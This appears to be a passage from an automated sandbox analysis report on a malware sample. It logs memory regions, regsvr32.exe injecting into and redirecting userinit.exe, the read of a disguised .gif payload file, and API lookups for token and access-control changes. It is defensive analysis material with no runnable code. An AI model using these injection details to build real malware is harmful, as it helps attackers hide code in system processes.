private_0x00000000027c0000	0x027c0000	0x028a6fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028aafff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028aefff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028b4fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028b8fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028bcfff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028c2fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028c6fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028cafff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028cffff	Private Memory	-	-
private_0x0000000002890000	0x02890000	0x02960fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x02976fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x0297afff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x0297efff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x02994fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x02998fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x0299cfff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x029a0fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029b6fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029bafff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029befff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029d4fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029d8fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029dcfff	Private Memory	rw	-
private_0x0000000002970000	0x02970000	0x02a42fff	Private Memory	rw	-
private_0x0000000002980000	0x02980000	0x02a60fff	Private Memory	rw	-
private_0x00000000029b0000	0x029b0000	0x02aa2fff	Private Memory	rw	-
private_0x00000000029c0000	0x029c0000	0x02ac0fff	Private Memory	rw	-
private_0x00000000029e0000	0x029e0000	0x02af2fff	Private Memory	rwx	-
private_0x0000000002b00000	0x02b00000	0x02bfffff	Private Memory	-	-
private_0x0000000002d40000	0x02d40000	0x02e3ffff	Private Memory	rw	-
sortdefault.nls	0x02e40000	0x0310efff	Memory Mapped File	r	-
olepro32.dll	0x6ce90000	0x6cea8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 18 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd5008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xf78, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ce90000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ¬ð", size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ce920ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ce920b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ce920c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ce920d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1708015	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #31: userinit.exe

222

0

»

Information	Value
ID	#31
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:36, Reason: Child Process
Unmonitor	End Time: 00:01:41, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0xf7c
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F80 0x F84 0x F88

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	rw	-
private_0x0000000000060000	0x00060000	0x0006ffff	Private Memory	rw	-
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	rwx	-
pagefile_0x0000000000080000	0x00080000	0x00086fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000090000	0x00090000	0x00091fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x000a0000	0x000a0fff	Memory Mapped File	r	-
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	rw	-
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	r	-
pagefile_0x0000000000160000	0x00160000	0x00227fff	Pagefile Backed Memory	r	-
private_0x0000000000230000	0x00230000	0x00230fff	Private Memory	rwx	-
pagefile_0x0000000000240000	0x00240000	0x00241fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00250000	0x00250fff	Memory Mapped File	r	-
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x003effff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
private_0x0000000000680000	0x00680000	0x006bffff	Private Memory	rw	-
private_0x00000000006c0000	0x006c0000	0x006cffff	Private Memory	rw	-
private_0x00000000006d0000	0x006d0000	0x0085ffff	Private Memory	rw	-
pagefile_0x00000000006d0000	0x006d0000	0x007aefff	Pagefile Backed Memory	r	-
private_0x0000000000820000	0x00820000	0x0085ffff	Private Memory	rw	-
private_0x0000000000860000	0x00860000	0x0091ffff	Private Memory	rw	-
pagefile_0x0000000000920000	0x00920000	0x00d12fff	Pagefile Backed Memory	r	-
private_0x0000000000d20000	0x00d20000	0x00e2cfff	Private Memory	rw	-
userinit.exe	0x00e70000	0x00e78fff	Memory Mapped File	rwx	-
pagefile_0x0000000000e80000	0x00e80000	0x01a7ffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01a80000	0x023affff	Memory Mapped File	r	-
private_0x00000000023b0000	0x023b0000	0x024affff	Private Memory	rw	-
private_0x00000000024b0000	0x024b0000	0x026affff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02730fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02734fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02738fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0273cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02742fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02746fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0274afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0274efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02754fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02758fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0275cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02762fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02766fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0276afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0276efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02774fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02778fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0277cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02782fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02786fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0278afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0278efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02794fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02798fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0279cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a2fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a6fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027aafff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027aefff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027b4fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027b8fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027bcfff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027c2fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027c6fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027cafff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027cefff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x027e4fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x027e8fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x027ecfff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x027f0fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x02806fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x0280afff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x0280efff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02824fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02828fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x0282cfff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02830fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02846fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0284afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0284efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02864fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02868fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0286cfff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02870fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02886fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0288afff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0288efff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028a4fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028a8fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028acfff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028b0fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028c6fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028cafff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028cffff	Private Memory	-	-
private_0x00000000027d0000	0x027d0000	0x02860fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028a2fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028c0fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02902fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x02920fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02962fff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x02980fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029c2fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029e2fff	Private Memory	rwx	-
private_0x00000000029f0000	0x029f0000	0x02aeffff	Private Memory	-	-
private_0x0000000002cb0000	0x02cb0000	0x02daffff	Private Memory	rw	-
sortdefault.nls	0x02db0000	0x0307efff	Memory Mapped File	r	-
olepro32.dll	0x6ce90000	0x6cea8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
